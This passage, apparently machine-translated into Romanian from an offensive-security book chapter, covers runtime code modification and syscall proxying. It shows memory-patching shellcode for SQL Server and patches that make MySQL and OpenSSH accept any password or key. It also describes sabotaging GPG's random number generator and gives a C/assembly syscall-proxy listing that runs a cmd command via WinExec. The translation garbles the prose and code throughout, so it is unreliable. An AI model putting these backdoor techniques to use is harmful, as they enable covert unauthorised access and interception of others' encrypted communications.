format linii; în real capitol aceste teme detaliu nu sunt considerate Tem nu Mai puțin, la scris cod apare rând Probleme despre care cheltuieli menționează Inainte de Total, program nu poate pur şi simplu rescrie Codul în memorie Windows NT controale acces la pagini memorie, și pagini cod de obicei marcă- sud atribut PAGE EXECUTE READ; atentat, încercare modificări Oportunitati la încălcare acces Problemă uşor rezolvat la Ajutor funcții VirtuaLProtect: ret = VirtualProtect ( abordare, num bytes to change PAGE EXECUTE READWRITE &old protection value) Program cauze funcţie VirtualProtect, la permite intrare în pagină, după ce înlocuiește octeți în memorie Dacă modificabil octeți sunt în dll, ei Mai dinamic mutare în memorie Cu exceptia A merge, adresa, pe la care produs modificare, depinde din nivel stabilit actualizări SQL Server, asa de program trebuie sa a încerca găsi octeți în memorie în loc de A merge, la pur şi simplu aduceți schimbări pe absolut abordare LA Următorul program greu codificat adrese pentru Windows Serviciu Rusk Codul extrem simplificat și destinat numai pentru demonstrație obiective: mov ex xs e mov edx x b mov ex x Următorul cmp eh, x je Sfârşit inc eax cmp dword ptr[eax], edx je găsite jmp Următorul găsite cmp dword ptr[eax + patru] ecx je găsite pe amândouă jmp Următorul găsite pe amândouă mov ebx eax esp x eax Apăsaţi Apăsaţi Apăsaţi Apăsaţi mov eax x e a ec caii eax mov mov mov xor caii eax , salva eax VirtualProtect apoi intrare PAGE EXECUTE READWRITE Cantitate octeți pentru retrageri protecţie , Elementar adresa retrageri protecţie Adresa VirtualProtect Întoarcere adrese eax, ebx dword ptr[eax], xb dword ptr[eax+ ], xc e eax eax SQL Server amenda gestionează Cu excepție asa de ne nu trebuie sa îngrijorare despre corect continuare Capitol Algernagivnyo strategii -pic modificare MySQL La introduce cititor Mai mult unu (anterior nu publicat) exemplu aplicatii metode, descris în anterior secțiune, noi considera mic modificare MySQL hopa schimbări mecanism la distanta autentificare Asa de, ce Server acceptă orice parola ȘI aceasta este mijloace ce la disponibilitate la distanta acces la Server MySQL tu poti autentifica în calitate orice admisibilă la distanta utilizator, nu știind a lui parola Mai mult o singura data subliniem noi ce asemănătoare actiuni util numai în niste situatii — A exact, când necesar: despre crea în sistem discretă "negru mutare"; despre utilizare oportunități aplicație/daemon pe interpretări complex a stabilit date; despre pe ascuns a depasi protecţie sisteme Timp din timp s-a întâmplat mai convenabil utilizare "legitim" canale interacțiuni, schimbându-se atribute Securitate astfel de canale LA exemplu Cu SQL Server noi interacționa Cu sistem în calitate comun utilizator, dar mulțumită plasture avem posibilitate a citi și Schimbare orice date Dacă atac într-adevăr Bun gândit în reviste va fi înregistrat performanţă privați operațiuni privați utilizatorii In orice caz, pe practică privilegiat comanda CPU mai des se dovedește Mai mult eficient decizie (cu toate că și Mai puțin graţios) La a intelege material acest secțiune, pentru tine va fi necesar iniţială textele MySQL; lor poate sa Descarca Cu site-ul www mysql com Pe moment scris cărți cele mai recente grajd versiuni a fost atribuit decedat b LA MySQL folosit suficient exotic mecanism autentificare, în care aplicat Următorul protocol la distanta autentificare: Client creează conexiune TCP Server trimite alerta și octeți apel Client criptează apel, hashing A mea parola ( octeți valoare) patru Client transmite primit criptat date Server pe TCP-sub- intrerupator cinci Server verificări criptat date funcţie check scramble din fişier sql\parolă c Dacă primit date corespund așteptări Server, funcţie Verifica încăierare se intoarce LA in caz contrar caz check scramble se intoarce Corespunzător fragment check scramble arata Asa de: in timp ce (*amestecate) G t dacă (* amestecat++ l= (caracter) (*la ++ ' suplimentar)) întoarcere /* Incorect parola */ întoarcere Auteni fiificare OpenSSH RSA Prin urmare, necesar modificare foarte simplu Ar trebui să conduce lot fragment la Următorul minte: in timp ce (*amestecate) tg (* amestecat++ != (caracter) (*la ++ suplimentar)) întoarcere : /* Incorect parola, dar aceasta este nu contează :despre) */ întoarcere ; LA rezultat orice contabilitate record, care poate folosit pentru la distanta acces, va fi muncă Cu orice parola DIN MySQL poate sa do Mai mult mulți interesant LA în special poate sa implementează modificare, asemănătoare alesul ce descris în anterior exemplu Cu SQL Server (orice utilizator lucru Cu drepturi dbo) Codul compilează în octet secvenţă Următorul drăguț (în format asamblator MS): SW Pagina C ecx eax je (patru octeți redirecţiona) ÎN mov toate EV jmp (patru octeți redirecţiona) EV C jmp ( octet înapoi) COxor al al Ne interesat comanda mov toate Dacă a inlocui a ei echipă mov al , orice utilizator va fi capabil muncă Cu orice parola Asa de modul în care suficient Schimbare octet (pl strict zicală pic) La toata lumea dorință imposibil a contribui mai mica schimbări, dar la acest complet paralizat mecanism îndepărtat Noah autentifica katsi și Alegere cale realizarea modificări în ţintă sistem ramane cititor pentru independent muncă Din punct de vedere istoric în MySQL a existat destul de putine vulnerabilitati, furnizarea posibilitate împlinire arbitrar cod; fără îndoială co timp voi descoperit și alte vulnerabilități In orice caz, chiar la absenta potrivit revărsare tampon modificare poate sa aplica la binar fişier, asa de despre a ei cheltuieli stiu Autentificare OpenSSH RSA descris principiu aplicabil aproape la oricine mecanism autentificare Pentru exemplu Hai sa luam mecanism autentificare OpenSSH R S A După scurt cercetare noi descoperi Următorul funcţie: int auth rsa verify response(Cheie *cheie BIGNUM *provocare, u char răspuns[ ]) u char buf[ ] mdbufL ] MD CTX md int len /★ nu permite mic de statura chei */ Capitol Alternativă strategii dacă (BN num bits(key->rsa->n) rsa ->n), SSH RSA MINIMUM MODULUS SIZE); întoarcere ( ): } /* Răspuns - Codul MD sume descifrat apel și identificator sesiune */ len = BN num bytes(provocare), dacă (len ) fatal("auth rsa verify response- rău provocare lungime M', len), memset(buf, , ), BN bn bin(provocare, buf + - len), MD Init(&md): MD Actualizare(&md tampon, ): MD Actualizare(&md, sesiune ID şaisprezece), MD Final(mdbuf, &md), /* Examinare raspuns */ dacă (memcmp(răspuns mdbuf şaisprezece) '= ) { /* Incorect Răspuns */ întoarcere ( ): } /* Corect Răspuns */ întoarcere(l), } La fel de și în anterior caz, noi suficient uşor găsi funcţie, care se intoarce sau în dependențe din A merge, cu succes a trecut autentificare sau Nu Adevăr, în caz OpenSSH Trebuie să Schimbare binar fişier pa disc, deoarece pentru autentificare OpenSSH generează copil proces Și Toata lumea la fel după substituiri comenzi întoarcere pe întoarcere Server SSH permite petrece autentificare orice utilizator Cu orice cheie Alte strategii modificări cod pe etape împlinire Recepţie modificări cod pe etape împlinire aproape nu descris în literatură, în Mai ales deoarece ce utilizare privilegiat comanda CPU mult mai eficient A proces dezvoltare implementate cod se dovedește Mai mult dificil (sau pe extrem merc, mai rea cunoscut) LA în special simplu aspect modificări pe etape împlinire a fost implementate vierme Cod roșu Vierme periodic încadrat în intrare Mese import IIS pentru funcții TcpSockSend adresa cod vierme, care întors şir "Tocat de Chinez!" în loc de necesar conţinut Astfel de decizie a fost mai elegant suprascrierea fisiere, deoarece ce logici alegere schimbătoare fișiere a fost ar suficient complicat apoi Cum oameni de știință înregistrări, sub care a lucrat Server IIS, ar putea bp interzis intrare în aceste fișiere Alte interesant particularitate Cod roșu (inerent cel mai programe, orientat pe lu Alte adică strategii modificări cod pe etape împlinire modificare pe etape execuţie) a fost în volum, ce schimbări fără urmă a dispărut pe loc la fel după se opreste și repornire proces dispariție modificari, stocate în operațional memorie, simultan este și binecuvântare și blestem atacator Pe variat platforme UNIX de multe ori sunt utilizate piscine muncitorii procese, care mâner cereri din clienti, A după Stop a lui Existenţă De exemplu, asemănătoare cale caz acesta este cazul Cu Apache Implementarea modificări în astfel de scenarii puțin schimbări deoarece ce termen existenţă instanță servere Cu modificat cod poate se dovedesc a fi relativ mic LA cel mai rău (pentru atacator) caz fiecare copie servere mânere neted unu client Anchetă LA acest caz pentru ulterior cereri modificare să fie efectuate ne va fi In orice caz, Cu puncte viziune atacator la piscine muncitorii proceselor mânca și avantaj — dovada a lui atrocități aproape pe loc la fel dispărea În afară de modificări scheme autentificare/autorizare, exista și alte, Mai mult insidios abordari Aproape fiecare protejat Apendice în jucărie sau diferit grad se bazează pe criptografie, A aproape fiecare criptografic mecanism în jucărie sau diferit grad depinde din generator Aleatoriu numere Pe primul vedere pare, ce modificare generator Aleatoriu numere nu va fi avea serios consecințe pentru Securitate, dar aceasta este impresie înșelător Metodă "rău şansă" aplicabil în orice situatii în care el poate pauză muncă scheme criptare Uneori el permite deplasați-vă protocoale autentificare împreună Cu criptare — în niste sisteme prin Aleatoriu apel utilizator trece autentificare, dacă el poate defini sens apel Când sens deja cunoscut sistem autentificare uşor înşela De exemplu, în dat exemplu Cu OpenSSH RSA a plati Atenţie pe Următorul linia: /* Răspuns - Codul MD sume descifrat apel și identificator sesiune */ Dacă apel va fi cunoscut anticipat, apoi pentru furnizarea corect raspuns nu neapărat stiu închis cheie Va ajuta dacă aceasta este deplasați-vă mecanism autentificare sau Nu — depinde din Protocol dar pe extrem măsura tu obține considerabil iniţială avantaj Alte bun exemple întâlni printre Mai mult tradiţional fonduri criptare De exemplu, dacă a reusi modifica altcineva cheie GPG sau PGP asa de modul în care la sesiune chei mesaje a ramas permanent, tu poti uşor descifra orice mesaj electronic Poștă, trimis acest utilizator Desigur, pentru acest Necesar posibilitate interceptare electronic Poștă, și Toata lumea la fel ne a reușit a depasi protecţie, furnizate mecanism criptare, pe Verifica realizarea mic schimbări în unu funcţie LA calitate exemplu considera modificare GPG , bazat pe "deteriorare" generator Aleatoriu numere Capitol Alternativă strategii Modificare GPG După descărcări iniţială textele noi să începem Cu căutare pe cheie cuvinte sesiune cheie" (sesiune cheie) Asa de e gasit funcţie make session key, care cauze funcţie randomize buffer pentru instalatii biți cheie Funcţie randomize buffer cauze funcţie get random bits, care în Ale mele întoarce cauze funcţie read pool (și read pool numit numai din obtine aleatoriu biți, asa de ne nu trebuie sa frică A greși alte părți programe) Analizand Codul read pool, noi găsi fragment, care Citeste Aleatoriu date din bazin în adoptiv tampon: /* Citit necesar date * Folosim auxiliar indicator, la citind * fiecare o singura data efectuate Cu nou pozitii */ in timp ce( lungime ) { *buffer++ = grup de chei[pool readpos++L dacă( pool readpos >= DIMENSIUNEA PISCINEI ) pool readpos = : pool balance : Asa de Cum pool readpos este static variabil, probabil, a ei condiție ar trebui să salva, asa de modificare va fi să arate ca Asa de: /* Citit necesar date * Folosim auxiliar indicator, la citind * fiecare o singura data efectuate Cu nou pozitii */ in timp ce( lungime ) { *buffer++ = OhcO: pool readpos++, dacă( pool readpos >= DIMENSIUNEA PISCINEI ) pool readpos = ; pool balance , } LA rezultat Toata lumea mesaje GPG, criptat Cu folosind acest binar fişier, voi avea aceeași sesiune chei (indiferent din algoritm) Se încarcă și lansa (server proglet) interesant varietate alternativă strategii este mecanism, care în fără sfârşit ciclu încărcături implementate Codul și Pornește a lui Acest metodă permite repede și relativ uşor transmite pe Server diferit fragmente implementate cod în dependențe din situatii Aceste mini-programe de multe ori numit proletarii (proglet) — pe singur din definiții proletariatul este tu „cel mai tare volum cod, care ortografiat Drept "din cap", nu are nevoie în editare și dreapta lucru Cu primul ori" (pe acest definiție proglets autor rar depaseste volum în cuplu asamblator comenzi) Principal Probleme, legate de Cu injurii: Mediat apel sistemică funcții despre În ciuda pe relativ mic volum, scris proletariatul poate se dovedesc a fi dificil faptă, deoarece ce proglets trebuie sa fi scris pe asamblator despre Nu exista general mecanism pentru definiții succes sau eșecuri împlinire proletariatul (și chiar simplu primind din -l weekend date) despre Dacă în a inghiti întâmpla accident, restabili normal muncă va fi nu asa de usor Chiar Cu luând în considerare toate enumerate Probleme mecanism proletarii are beneficii față de unică folosință static solutii In orice caz, uneori necesar Mai mult pe scară largă și dinamic o abordare — astfel de, Cum metodologie indirect apel sistemică funcții Mediat apel sistemică funcții La fel de remarcat în din timp acest capitole, în cel mai arhive implementate cod se intalneste o multime de puțin diferit fragmente, performant asemănătoare funcții La efectuarea atacuri pa baza implementate cod de multe ori apărea situatii în care Codul de neînţeles cale refuză muncă De obicei atac face rezonabil presupunere relativ motive și caut ocolire cale De exemplu, dacă multiplu încercări alerga cmd exe nici la ce nu LED, poate sa încerca copie proprii versiune cmd exe pe ţintă hosg și a încerca alerga a ei ȘI poate a fi, tu încercând a executa intrare în fişier, pentru care (Cum se dovedește) la tu animal de companie necesar permisiuni; Prin urmare, trebuie sa a încerca primul a ridica privilegiu L poate a fi, Codul încălcări chroot pe niste motiv nu dorințe muncă problemă aproape mereu cont pentru rezolva includere adiţional asamblator plasture sau pur şi simplu căutare un alt cale pe atacat un calculator Tem nu Mai puțin, exista decizie simultan universal, elegant și eficient în relație mărimea implementate cod — mediatizat apel sistemică funcții Metodologie indirect apel a fost primul prezentat Tim Newshe-mohm (Tim Ncwsham) și Oliver Fridriks (Oliver Friedrichs, A apoi primit adiţional dezvoltare în excelent articol Maximiliano Caceres (Maximiliano Caceres) din core-sdl (www coresecurity com/files/files/ll/SyscaLLPro-xying pdf) acest metodologie implementate Codul în ciclu cauze sistemică funcții pe Ordin atacator și se intoarce rezultate LA fila afișate Cum aceasta este petrecându-se Masa Mecanism indirect apel sistemică funcții Timp T= Client gazdă Plug Rețea Mediator O Apel prize Pachet parametrii în tampon pentru expediere pe retelelor Capitol Alternativă strategii Timp T= Client gazdă Ciot Reţea Mediator Transport date Unboxing parametrii patru Apel sistemică funcții cinci Pachet rezultate pentru expediere pe retelelor Transport date Unboxing rezultate Întoarcere din prize nouă Interpretare rezultate Următorul apel Cu toate că mediatizat apel nu mereu disponibil (din cauza găsirea ţintă hosta în rețele), acest metodologie extrem util, Asa de Cum atac poate dinamic a determina efectuat actiuni pe bază date, primit din gazdă Sa spunem la atac pe sistem Windows nu a reusi Editați | × niste fişier Noi control actual Nume utilizator și descoperi ce lucram Cu drepturi cu privilegii reduse utilizator După ce a hotărât ce gazdă vulnerabil pentru a ridica privilegii pe baza vulnerabilități numit canale, noi apel functii, necesar pentru a ridica nivel privilegii LA rezultat noi primim sistemică privilegiu LA general caz Poate indirect performanţă toate acțiune proces, lucru pe al nostru calculator, Cu redirecţiona apeluri sistemică funcții (sau funcții Win API în ferestre) pentru împlinire pe ţintă compilator aceasta mijloace ce noi de fapt Poate sa alerga orice necesar programe prin intermediar, și relevante fragmente cod voi împlinit pe ţintă gazdă Cititorii familiar Cu RPC, va observa asemănare între mecanism apel sistemică funcții și (Mai mult uzual) mecanisme RPC — și aceasta este nu întâmplător, deoarece ce la implementare indirect apel cont pentru rezolva asemănătoare Probleme Mai mult A merge, cel mai Acasă problemă în ambii cazuri aceeași — promovare (marshaling) sau pachet parametrii sistemică funcții în formă, care ar furnizate lor simplu reprezentare în liniar curgere date LA entitate, în mic asamblator fragment noi implementează foarte puțin server RPC Exista pereche diferit abordari la implementare intermediar: despre Difuzare grămadă, apel funcții și întoarcere grămadă despre Difuzare intrare parametrii în continuu bloc memorie, apel funcții și întoarcere weekend parametrii Mediat apel sistemică funcții Primul cale simplu, compact și uşor programat, dar conjugat Cu ineficace folosind canal (excesiv expediere weekend date Cu client pe Server) și rău lucru în acestea cazuri, când întors sens nu stocate în grămadă, de exemplu, pentru funcții GetLastError Windows Cu toate că al doilea metodă puțin mai dificil, el mai bine se potrivește pentru incomod întors valorile şef a lui dezavantaj este necesitate definiții prototipuri functii, numit pe la distanta gazdă, la client știa ce fel date trebuie sa transfer Eu insumi intermediar la fel ar trebui să a fi capabil să distinge intrare și weekend Opțiuni, tipuri indicatoare, literali și t d Probabil, la acestea, OMS semn Cu RPC, relevante definiții voi puternic arată ca pe instrucțiuni limba IDL Probleme indirect apel De-a lungul Cu virtuti dinamic caracter, mecanism indirect apel are întreg din apropiere neajunsuri, care Mai influență pe decizie despre a lui aplicarea în specific situatii: despre Probleme Cu unelte LA dependențe din cale implementare Mai apărea Probleme Cu pregătire unelte, care trebuie sa dreapta realiza promovare pentru apeluri sistemică funcții despre Probleme Cu iterații Fiecare apel funcții legat Cu bilateral expediere date Pentru mecanisme, inclusiv mii operațiuni, aceasta este poate a fi suficient obositor (mai ales la atac pe retelelor Cu mare timp întârzieri) despre Problemă paralelism Greu organiza paralel performanţă Două și Mai mult operațiuni La toate enumerate Probleme Sunt solutii, dar ei de obicei conectat Cu căutare ocolire moduri sau adopţie deciziilor pa arhitectural nivel despre Posibil decizie primul Probleme — utilizare limba înalt nivel pentru scris Total unelte și ulterior indirect recurs pentru toate sistemică apeluri interpret acest limba (fi apoi perl, Piton, PHP, Java și t d ) Defect astfel de solutii este în volum, ce la tu, probabil, deja disponibil foarte mare număr în mod constant folosit unelte, care Mai absent în Perl sau prieten limba despre Posibil solutii al doilea Probleme: • expediere executabil cod (cm capitol, dedicat a inghiti) pentru cazuri necesită mare cantități iterații; • Se încarcă niste soiuri interpret în ţintă proces Cu ulterior Se încarcă scenariu (în loc de fragmente implementate cod) Evident, ambii opțiune suficient neplăcut despre Al treilea problemă a fost ar parţial rezolvat dacă ar la ne a fost posibil gh da naștere adiţional proces intermediar — dar astfel de luxos acces pe departe nu mereu Mai mult general decizie este în sincronizare Capitol Alternativă sirategie mediator acces la curgere date și organizatii paralel multifile acces Astfel de decizie suficient greu implementează În ciuda pe Toata lumea enumerate limitări, mediatizat apel încă este cel mai dinamic cale utilizare orice defecte, legate de Cu aplicarea implementate cod, și destul de merita Atenţie LA imediat ani ar trebui să aştepta aspect numeroase solutii fondat pe indirect apel interes de dragul hai sa vom proiecta și implementează mic sistem indirect apel pentru platforme Windows Pe probă în al nostru decizie va fi Luat arhitectura IDL, deoarece ce ea mai bine se potrivește pentru funcții Windows API și ajută defini cale prelucrare întors date Primul trebuie sa gândi despre volum, Cum implementate Codul va fi despacheta Opțiuni pentru numit funcții Presupus, ce la ne deja mânca titlu, conținând Descriere numit funcții și alte date (de exemplu, steaguri sau ceva în acest drăguț; nu noi vom persista pe acest acum) La fel o sa ai nevoie listă parametrii Cu date Probabil, în pego la fel ar trebui să aprinde niste steaguri Exemplar vedere date după promovare poate sa estima pe fila Masa General structura indirect apel Titlu tbl DLLName FunctionName ParameterCount Înregistrare listă parametrii Marimea Date (pentru intrare sau intrare ieșire parametri) La oficializează acest sarcină, mai simplu Total introduce, ce fel provocări voi folosit în program, și a analiza liste parametrii Fara indoiala va fi necesar operațiuni creare și descoperiri fișiere MÂNER CreateFiIE( LPCSTR IpFileName // Indicator pe Nume fişier DWORD dwDesiredAccess, // Modul acces (Citeste, scrie) LPSECURITY ATTRIBUTES pSecurityAttributes // Indicator pe atribute Securitate DWORD dwCreat onDIsposltion, // Modul creare DWORD dwFlagsAndAttributes // Atribute fişier MÂNER hTemplateFile // Identificator fişier Cu copiat // atribute Asa de, disponibil indicator pe linia, efectuat zero (în ASCII sau Unicode), pe care ar trebui să literal DWORD Noi ne regăsim față primul problemă: necesar distinge literali (date) și link-uri (indicatoare pe date) Boo Mediat apel sistemică funcții dem utilizare pentru acest obiective steag IS PTR Dacă steag instalat, mijloace, parametru ar trebui să fi transmis funcții Cum indicator pe date, A nu Cum literal aceasta mijloace ce față provocare funcții în grămadă a intrat adresa date, A nu înșiși date Noi vom gândi, ce în listă la fel va fi fi transmis lungime toata lumea parametru; aceasta este va permite transmite structurilor în calitate intrare date, Cum aceasta este făcut în parametru IpSecurityAttributes Trecere steag indicator și marimea date în plus la de unii singuri date, noi deja Poate sa apel CreateFile In orice caz, exista mic dificultate; probabil, întors sens trebuie sa oarecum prelucrate în program Probabil, pentru acest în listă ar trebui să adăuga special parametru Funcţie CreateFile se intoarce sens tip MÂNER ( octeți întreg fără semn), apoi mânca date, A nu indicator pe lor Dar dacă noi a determina Toata lumea Opțiuni funcții Cum intrare, și numai întors sens Cum zi libera parametru, apoi funcţie nu nu va fi capabil întoarcere nimic, în afară de unu întors valorile Problemă rezolvat definiție Două adiţional steaguri pentru listă parametri: despre ESTE IN — parametru conţine date, transmise funcții; despre ESTE AFARA — parametru conţine date, întors funcţie Disponibilitate aceste Două steaguri la fel decide problemă Cu parametrii, care simultan sunt intrare și weekend, în Următorul prototip: LUNG RegQueryValueEx( HKEY hTasta LPTSTR IpValueName, LPDWORD IpReserved LPDWORD iptype LPBYTE Ipdata LPDWORD IpcbData astfel de Cum parametru LpcbData Identificator secțiune Adresa Nume parametru rezervat Adresa tampon pentru tip Adresa tampon date Adresa mărimea tampon date registru parametru Funcţie RegQueryValueEx interfata Win API folosit pentru mostre date din secțiune în registru Windows Pe Intrare parametru LpcbData indica pe dubla cuvânt Cu lung tampon date, în care trebuie sa a fi plasat citit sens Pe ieșire el conţine lungime date, copiat în tampon Să cheltuim scurt verificare alții prototipuri: BOOL ReadFI e( MÂNER hFile, LPVOID IPBuffer, DWORD nNumberOfBytesToRead LPDWORD IpNumberOfBytesRead LPUPRASPUNE pSuprapuse // Identificator fişier pentru citind // Indicator pe tampon pentru date // Cantitate lizibil octeți // Indicator pe număr citit octeți // Indicator pe structura Toata lumea amenda — noi Poate sa cere zi libera tampon arbitrar mărimea, da și Cu alții parametrii Probleme nu va fi Capitol Alternativă strategii La selectat cale ambalaj parametrii mânca unu util proprietate: la apel readfile nu trebuie sa redirecţiona pe canal Toata lumea octet intrare tampon — suficient indica, ce transmise parametru ESTE AFARA, marimea pe cine egală octet Asa de modul în care pentru citind octet noi transfer Total cinci octet, A nu La găsi funcţie, care nu a reusi apel Cu folosind descris mecanism, Trebuie să temeinic muncește din greu De exemplu, Probleme Mai apărea Cu functii, care aloca tampoane și întoarcere indicatoare pe lor Sa spunem disponibil Următorul funcţie: MyStruct *GetMyStructure(): LA principiu poate sa a fost ar instalare pentru întors valorile steaguri IS PTR și ESTE AFARA și specifica marimea dimensiunea(struct MyStruct); noi primim date în întors structura Structura mea, dar apoi la ne nu va fi adrese structurilor pentru ulterior apel liber() hai sa hai sa reparam date întors valorile Asa de, la la întoarcere indicator la fel întors literal La astfel de decizie noi noi vom mereu a pastra adiţional patru octeți pentru întors valoare-literală indiferent din A merge, este aceasta literal sau Nu Amendament decide majoritate Probleme dar niste Toata lumea la fel rămâne Considera ca urmare a anunţ: char *asctime(const struct tm *timeptr ) Funcţie asctime() se intoarce efectuat zero linia, maxim lungime care este octeți Pentru acest caz de asemenea poate sa a fost ar a contribui amendament și cerere, la pentru toata lumea întors şir tampon, efectuat zero Evidențiat marimea Dar astfel de decizie va necesita expediere de prisos date, asa de noi defini steaguri IS SZ (indicator pe tampon, efectuat zero octet) și IS SZZ (indicator pe tampon, efectuat Două zero octeți — de exemplu, şir Unicode) Mediator ar trebui să muncă pe Următorul sistem: A primi Nume biblioteci dll, conținând funcţie A primi Nume funcții A primi număr parametrii patru A primi volum date, rezervat pentru weekend parametrii cinci A primi steaguri funcții (conventii apel și t d ) A primi Opțiuni: • a primi steaguri parametrii (ptr, în, afară, sz, szz); • a primi marimea parametrii; • a primi date parametrii (pentru ip sau în afară); • aduceți în grămadă sens parametru (În afară de ptr); • aduceți în grămadă indicator pa date (pentru ptr); • scădea tejghea; dacă Opțiuni Mai mult a ramas, continua prelucrare Mediat apel sistemică funcții / convoca funcţie Întoarcere weekend date Noi dezvoltat general arhitectură intermediar, potrivit practic pentru orice funcții Win API Avantaj al nostru mecanism include în volum, ce el Bun gestionează Cu întors date și ridică eficienţă expediere pe Verifica aplicatii concepte intrare ieșire date La neajunsuri ar trebui să atribuite necesitate instrucțiuni prototip pentru fiecare numit funcții în asemănător IDL format (in orice caz, aceasta este nu Asa de deja esenţial; cu greu dacă o sa ai nevoie apel Mai mult sau funcții) LA Următorul listare prezentat puțin trunchiată versiune implementare intermediar în implementate cod Pentru ne interes este secțiune AsmDemar-shallAndCaLL Noi manual a executa acestea operațiuni, care trebuie sa să fie efectuate program automat: primind adrese LoadLibrary și GetProcAddress și conservare link-uri pe start primit curgere date în EVH // rsc c // Simplu mecanism la distanta apel sistemică funcții Windows # include # include #include #include int Mareșal K nesemnat char steaguri nesemnat mărimea nesemnat char *date nesemnat char *afara nesemnat outjen ) { afară[ ] = steaguri *((nesemnat *)(&(ieșit[ ]))) = mărimea memcpy( &(out[ ]), date, mărimea ), întoarcere mărimea + cinci, } ////////////////////////////////////////////// // Steaguri parametrii ////////// ////////////////////////////////////////////// // Parametru conţine indicator pe date, A nu înșiși date #def ne IS PTR x // Orice parametru poate a fi intrare (SH) weekend (afara) // sau combinate (În | afară) #defini ESTE IN x #defini ESTE AFARA x // Date, efectuat zero octet #defini IS SZ x // Date, efectuat Două zero octeți (de exemplu, linia Unicode) #defini IS SZZ x Capitol algoritmic strategii //////////////////////////////////////////// // Steaguri funcții /////////// //////////////////////////////////////////// // Funcţie utilizări convenţie cdecl (tăcut // convenţie este stdcall) #defini FN CDECL x int AsmDemarshallAndCall ( nesemnat char *piele de bivol, gol *loadlib, gol *getproc // Opțiuni: // ebp Nume DLL (nume dll) // + Nume funcții (fnname) // + Cantitate parametrii // + Marimea weekend parametrii // + Steaguri funcții // + Tejghea parametrii // + LoadLibrary // + GetProcAddress // + Adresa tampon date asm { // Pregătirea parametrii niste devine mai complicat subiecte fapt // ce numit funcţie conţine incorporat asamblator Codul Apăsaţi ebp sub mai ales, x mov ebp, esp mov ebx, dword ptr[ebp+ xl ]; // piele de bivol mov dword ptr [ebp + ], : mov eax dword ptr [ebp+ xl c],//loadlib mov dword ptr[ebp + ] eax, mov eax dword ptr [ebp+ x! ] //getproc mov dword ptr[ebp + ] eax: mov dword ptr [ebp], ebx, // ebx = dllname sub mai ales, x // Fă o rezervare memorie mov dword ptr[ebp + ] esp jmp start // Crește ebx inainte de detectare octeți 'O' skip string mov al octet ptr [ebx], cmp al ; jz done string: inc ebx jmp skip string şir de terminat Mediat apel sistemică funcții ne ebx ret ■J artă // Ocolire Nume dll caii skip string, // salva Nume funcții mov dword ptr[ ebp + patru ], ebx // Ocolire Nume funcții caii skip string, // salva număr parametrii mov ex dword ptr [ebx] mov edx ecx mov dword ptr[ ebp + ] ecx // salva marimea parametru adăuga ebx, mov ecx dword ptr [ebx] mov dword ptr[ ebp + ] ecx // salva steaguri funcții adăuga ebx mov ecx dword ptr [ebx] mov dword ptr[ ebp + şaisprezece ], ecx zgomot ebx // LA acest ciclu edx conţine număr rămas parametrii următorul param cmp edx O je call proc mov cl octet ptr[ ebx ] // cl - steaguri inc ebx, mov eax, dword ptr[ ebx ] // eax = mărimea adăuga ebx patru mov ch cl și cl // Indicator jz not ptr mov cl,ch, // Indicator pe 'în' sau 'afara' și cl, , jnz este in, // Mijloace, Hei 'afara' // A primi actual indicator pe date mov ex dword ptr [ ebp + J pusn ecx Capitol Alternativă strategii // Instalare indicator în sfarsit tampon date adăuga dword ptr [ ebp + ] eax adăuga ebx eax dec edx jmp următorul param este in- Apăsaţi ebx // Parametru se aplică la tip 'în' sau 'în afară' // aceasta mijloace ce date conținea în adoptat pachet adăuga ebx, eax dec edx jmp următorul param nu ptr- mov eax dword ptr[ ebx ]: Apăsaţi eax: adăuga ebx patru dec edx jmp următorul param; call proc // Pregătirea parametrii efectuat Poate sa apel fui mov ex dword ptr[ ebp ] Apăsaţi eax: mov eax dword ptr[ ebp + ]: caii eax; mov ebx, eax, mov eax, dword ptr[ ebp + patru ]: Apăsaţi eax: Apăsaţi ebx mov eax dword ptr[ ebp + ]: caii eax // GetProcAddress caii eax // Apel al nostru funcții // Curatenie adăuga esp x ; adăuga esp x : pop ebp } întoarcere : int principal( int argc char *argv[] ) { nesemnat char piele de bivol[ ], nesemnat char *psz DWORD frecvență = , DWORD dur = DWORD spectacol = MÂNER hk gol *loadlib *getproc, char * cmd = "cmd /Cu dir > c Wfoo txt" Rezultate psz = piele de bivol: strcpy( psz, „kerne! dll" ) psz += strlen( psz ) + , strcpy( psz, "winexec" ): psz += strlen( psz ) + ; *((nesemnat *)(psz)) = , // Cantitate parametrii psz += patru, *((nesemnat *)(psz)) = strlen( cmd ) + , // Marimea parametru psz += patru, // Steaguri *((nesemnat *)(psz)) = : psz += patru: psz += Mareșal K ESTE IN, dimensiunea( DWORD ) (nesemnat char *)&spectacol, psz dimensiunea( piele de bivol ) ), psz += Mareșal K IS PTR | ESTE IN, strlen( cmd ) + (nesemnat char *)cmd, psz, dimensiunea( piele de bivol ) ), hk = LoadLibrary( „kernel dll" ): loadlib = GetProcAddress( hk , „LoadLibraryA” ): getproc = GetProcAddress( hk , „GetProcAddress” ), AsmDemarshallAndCalK piele de bivol, loadlib, getproc ), întoarcere } Prezentat program decide ns mai ales interesant sarcină: ea reface Opțiuni și cauze funcţie winexec pentru creare fişier în rădăcină director disc DIN Tem ns Mai puțin, acest program lucru și demonstreaza descris metodologie Central parte cod ia puţini Mai mult octet Chiar după adaosuri auxiliar cod Toata lumea decizie cere Mai puțin octet Rezultate LA acest capitol considerată metodologie modificări cod pe etape execuţie În loc de creare simplu implementate cod, lucru metodă verso conexiuni și uşor detectabil sisteme detectare invazii (IDS) discretă modificare lucru cod devine excelent Test pa pricepere pe ascuns pătrunde în sistem La fel detaliu descris concept indirect apel, deoarece ce, mai repede Total, în viitor mare parte implementate cod va fi fi creat exact pa bază indirect apel CAPITOL optsprezece Real termeni, real Probleme La toata lumea defect mânca proprii istorie Defecte născut, Trăi și Sunt pe moarte de multe ori Asa de și rămânând ascuns și nefolosit Pentru hacker orice defect se deschide frumoasa petrecându-se crea Codul "magic vrăji", care se întoarce vulnerabil perete în Uşă Dar unu caz - crea decizie pentru laborator medii și deloc alte — pentru electronic junglă contemporan Internet Acest capitol dedicat deciziilor pentru real conditii Factori lipsa de încredere LA acest părți capitole considerată variat cauze, din cauza care ta decizie poate nu muncă în real conditii In orice caz, tu nu trebuie sa speria abundenţă posibil Probleme — Cum spune "chiar ORB pui uneori găsește porumb" magic numere niste vulnerabilități (astfel de, Cum revărsare grămadă Real Server, descris în capitol ) se împrumută de încredere Operațiune Alte (sa spunem defect dubla apel funcții liber() în dtogin) practic imposibil exploata orice grajd Tem nu Mai puțin, judecător despre fiabilitate solutii poate sa numai după A merge, Cum tu încerca aplica a lui pe practică Cu exceptia A merge, exploatare Toata 